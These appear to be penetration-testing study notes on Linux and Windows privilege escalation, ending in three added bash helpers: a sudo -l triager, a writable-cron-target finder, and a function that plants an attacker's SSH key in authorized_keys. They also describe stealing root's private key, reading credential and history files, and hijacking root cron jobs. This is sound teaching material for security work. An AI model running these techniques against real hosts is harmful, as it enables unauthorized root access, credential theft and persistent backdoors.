# PrivEsc Checklists
- develop separate checklists for Linux and Windows
- resources:
  - https://book.hacktricks.wiki/en/index.html
  - https://github.com/swisskyrepo/PayloadsAllTheThings

# Enumeration Scripts
- Linux
  - LinEnum - https://github.com/rebootuser/LinEnum
  - linuxprivchecker - https://github.com/sleventyeleven/linuxprivchecker
  - linPEAS - https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS
- Windows
  - Seatbelt - https://github.com/GhostPack/Seatbelt
  - JAWS - https://github.com/411Hall/JAWS
  - PowerUp - https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
  - winPEAS - https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS
- these scripts run _many_ commands known for identifying vulns and create a serious amount of noise that may trigger AV or EDR; on a monitored host, run the individual checks by hand instead

# Kernel Exploits
- start by determining whether the target machine's kernel is vulnerable
  - Linux: `uname -a` or `cat /proc/version`
  - Windows: `systeminfo` (OS version and installed hotfixes)
- example: Dirty COW (CVE-2016-5195), a race condition in the kernel's copy-on-write handling of private read-only mappings that lets a local user write to files it can only read; a kernel such as `3.9.0-73-generic` falls in the affected range
- caveat: distros backport kernel fixes without changing the version string, so confirm against the distro's changelog before firing a kernel exploit, and remember that a failed kernel exploit can crash the box

# Vulnerable SW
- use `dpkg -l` on Debian-based Linux (`rpm -qa` on RPM-based) to list installed SW and versions
- look in `C:\Program Files` and `C:\Program Files (x86)` on Windows
- compare the versions found against public exploit databases

# User Privileges
- once we have access to a machine, we may be able to escalate our privs to root/SYSTEM by various methods
- `sudo`
  - run `sudo -l` to list current `sudo` privs
  - if `(ALL : ALL) ALL` exists for the current user, simply switch to root using `sudo su -`
  - an entry reads `(run-as user : run-as group) [NOPASSWD:] command`, so `(user : user) NOPASSWD: /bin/echo` means `/bin/echo` can be run as `user` without a password, not as root; run it with `sudo -u user /bin/echo Hello World!`
  - only entries whose run-as user is `root` or `ALL` (e.g. `(root) NOPASSWD: /usr/bin/find`) are direct paths to root
  - check GTFOBins (https://gtfobins.github.io/) for ways to abuse the binaries allowed by these `sudo` entries
  - LOLBAS (https://lolbas-project.github.io/) is the Windows counterpart, a list of "living off the land" binaries
- `SUID`
  - list SUID binaries with `find / -perm -4000 -type f 2>/dev/null` and check them against the SUID section of GTFOBins
- Windows token privileges
  - list them with `whoami /priv`; privileges such as `SeImpersonatePrivilege` and `SeBackupPrivilege` are common escalation paths

# Scheduled Tasks
- in both Linux and Windows, there are methods for running scripts according to a set schedule
  - scheduled tasks for Windows (`schtasks /query /fo LIST /v` lists them)
  - `cron` jobs for Linux
- as an attacker, take advantage of this by either:
  - adding our own scheduled task/cron job (needs write access to the crontab or task store)
  - tricking an existing scheduled task/cron job into executing a malicious script, e.g. by overwriting a script it calls that we can write

## Cron Jobs
- see if the current user has write perms over any of the jobs in:
  - `/etc/crontab`
  - `/etc/cron.d`
  - `/var/spool/cron/crontabs/root`
- also check whether the scripts those jobs execute (or their parent directories) are writable; jobs in the system crontab files run as the user named in their user column, usually root

# Exposed Credentials
- look in files that we can read with the current user for exposed creds
- common examples:
  - config files
  - log files
  - user history files
    - `~/.bash_history` in Linux
    - `PSReadLine` in Windows (`%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt`)
- check for password reuse across users and services

# SSH Keys
- if we have read access to a `.ssh` directory, look for `id_rsa` (or `id_ed25519`, etc.) files, which hold private keys
- for example, copy the private key from the target machine's `/root/.ssh/` directory to the attacker machine, then use it to log in
```bash
# once the private key is on the attacker machine
vim id_rsa                 # paste the key into a new file
chmod 600 id_rsa           # ssh ignores private keys with permissive perms
ssh -i id_rsa root@target_ip
```
- if we have write access to the `.ssh` directory, place our own pub key in `/home/user/.ssh/authorized_keys` to gain access as that user
- to generate a new key pair on the attacker machine, run `ssh-keygen -f output_file` to specify the output file for the new key pair; `output_file.pub` is the half that goes into `authorized_keys`
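The `sudo -l` triage under User Privileges, as an added example that is not part of these notes: a bash function (`triage_sudo`, my name) reads `sudo -l` output on stdin and prints one tab-separated line per allowed command with the run-as user, whether a password is needed, the command, and the next step, distinguishing entries that really run as root from entries that only run as another user. The sample `sudo -l` output, user and host names are constructed for the stand-alone run.

```bash
#!/usr/bin/env bash
# Added example, not from the notes. Assumes sudo's usual entry format:
#   (runas_user[ : runas_group]) [TAG: ...] command[, command...]
triage_sudo() {
  local entry_re='^\(([^)]+)\)[[:space:]]+(.*)$'
  local tag_re='^([A-Z]+):[[:space:]]+(.*)$'
  local line runas runas_user rest tags cmd bin pw hint
  local -a list
  while IFS= read -r line; do
    line="${line#"${line%%[![:space:]]*}"}"            # strip leading blanks
    [[ "$line" =~ $entry_re ]] || continue             # skip "Defaults"/header lines
    runas="${BASH_REMATCH[1]}"; rest="${BASH_REMATCH[2]}"
    runas_user="${runas%% *}"                          # "(ALL : ALL)" -> ALL, "(user : user)" -> user
    tags=""
    while [[ "$rest" =~ $tag_re ]]; do                 # peel NOPASSWD:, SETENV:, ...
      tags="$tags${BASH_REMATCH[1]} "; rest="${BASH_REMATCH[2]}"
    done
    case "$tags" in *NOPASSWD*) pw="nopasswd" ;; *) pw="passwd" ;; esac
    IFS=',' read -ra list <<< "$rest"                  # one entry may list several commands
    for cmd in "${list[@]}"; do
      cmd="${cmd#"${cmd%%[![:space:]]*}"}"; cmd="${cmd%"${cmd##*[![:space:]]}"}"
      bin="${cmd%% *}"; bin="${bin##*/}"               # basename of the binary, arguments dropped
      if [ "$runas_user" = ALL ] || [ "$runas_user" = root ]; then
        if [ "$cmd" = ALL ]; then hint="root shell: sudo su -"
        else hint="runs as root: check GTFOBins for '$bin'"; fi
      else
        hint="runs only as $runas_user (sudo -u $runas_user $cmd), not root"
      fi
      printf '%s\t%s\t%s\t%s\n' "$runas_user" "$pw" "$cmd" "$hint"
    done
  done
}

# Constructed sample of `sudo -l` output for a stand-alone run (not from a real host).
SUDO_L_SAMPLE='Matching Defaults entries for user on host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/bin

User user may run the following commands on host:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/find, /usr/bin/vim
    (user : user) NOPASSWD: /bin/echo'

triage_sudo <<< "$SUDO_L_SAMPLE"
```

On a live box run `sudo -l | triage_sudo`. The `(user : user)` line is reported as a non-root path on purpose: it is the case the notes' own example describes, and it only escalates if `user` is a more interesting account than the current one.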
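The "trick an existing cron job" check from the Cron Jobs section, as an added example that is not part of these notes: `cron_writable_targets` (my name) reads a crontab file, skips comments and `VAR=value` lines, drops the schedule (and, for system crontabs, the user column), and reports every absolute path on the command part that the current user can write, plus the crontab itself if it is writable. The fake `/etc/crontab` and the two scripts it calls are constructed in a temp directory so the block runs stand-alone.

```bash
#!/usr/bin/env bash
# Added example, not from the notes.
# cron_writable_targets FILE [system|user]
#   "system" (default): /etc/crontab or /etc/cron.d/* format, which has a user column
#   "user":             per-user crontabs (/var/spool/cron/crontabs/*), which do not
cron_writable_targets() {
  local file="$1" format="${2:-system}" line tok skip
  local -a fields cmd
  if [ -w "$file" ]; then echo "WRITABLE crontab: $file"; fi
  while IFS= read -r line; do
    line="${line#"${line%%[![:space:]]*}"}"
    case "$line" in ''|'#'*|[A-Za-z_]*) continue ;; esac   # blank, comment, VAR=value
    read -ra fields <<< "$line"                             # word-split without glob-expanding '*'
    case "${fields[0]}" in @*) skip=1 ;; *) skip=5 ;; esac  # @reboot/@daily vs five time fields
    if [ "$format" = system ]; then skip=$((skip + 1)); fi  # system crontabs add the user column
    cmd=("${fields[@]:$skip}")
    for tok in "${cmd[@]}"; do
      case "$tok" in
        /*) if [ -w "$tok" ]; then echo "WRITABLE target: $tok (from: $line)"; fi ;;
      esac
    done
  done < "$file"
}

# Constructed sample for a stand-alone run: a fake /etc/crontab in a temp dir that
# calls two scripts; we own both but only backup.sh is left writable.
demo_dir=$(mktemp -d)
printf '#!/bin/sh\necho backup\n' > "$demo_dir/backup.sh"
printf '#!/bin/sh\necho cleanup\n' > "$demo_dir/cleanup.sh"
chmod 555 "$demo_dir/cleanup.sh"
cat > "$demo_dir/crontab" <<EOF
# constructed /etc/crontab, not from a real host
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/bin
17 *  * * *  root  cd / && run-parts --report /etc/cron.hourly
*/5 * * * *  root  /bin/bash $demo_dir/backup.sh
@reboot      root  $demo_dir/cleanup.sh
EOF
chmod 444 "$demo_dir/crontab"
cron_writable_targets "$demo_dir/crontab"
```

Run it as the low-privileged user you are enumerating as: to root, `-w` is true for everything, so the output is meaningless from a root shell. The check only looks at the file itself; a writable parent directory also lets you replace the script, and the `cron.hourly`/`cron.daily` directories named by `run-parts` deserve the same `ls -la` treatment.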
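The write-access step from the SSH Keys section, as an added example that is not part of these notes: `install_pubkey` (my name) appends a public key line to `HOME_DIR/.ssh/authorized_keys` exactly once and sets the permissions sshd's default `StrictModes` insists on (home and `.ssh` not group/world-writable, `authorized_keys` 600), which is the detail that silently breaks this technique when the directory has to be created from scratch. The key line below is a placeholder, not a real key; generate a real pair on the attacker machine with `ssh-keygen -t ed25519 -f attacker_key` and pass the contents of `attacker_key.pub`.

```bash
#!/usr/bin/env bash
# Added example, not from the notes.
# install_pubkey HOME_DIR PUBKEY_LINE -> prints how many times the key is now present (1)
install_pubkey() {
  local home="$1" key="$2"
  local dir="$1/.ssh" ak="$1/.ssh/authorized_keys"
  mkdir -p "$dir"
  chmod 700 "$dir"                      # StrictModes: .ssh must not be group/world-writable
  touch "$ak"
  chmod 600 "$ak"                       # and neither may authorized_keys
  if ! grep -qxF -- "$key" "$ak"; then  # idempotent: re-running must not duplicate the key
    printf '%s\n' "$key" >> "$ak"
  fi
  chmod go-w "$home"                    # the home directory is checked too
  grep -cxF -- "$key" "$ak"
}

# Placeholder key for the stand-alone run; not a real key.
DEMO_PUBKEY='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERNOTAREALKEY attacker@kali'

demo_home=$(mktemp -d)                  # constructed stand-in for /home/user
install_pubkey "$demo_home" "$DEMO_PUBKEY"
```

Afterwards `ssh -i attacker_key user@target_ip` logs in without a password. If it still prompts, check `/etc/ssh/sshd_config` for `PubkeyAuthentication` and a non-default `AuthorizedKeysFile`, and compare the host's `sshd` logs for a "bad ownership or modes" message.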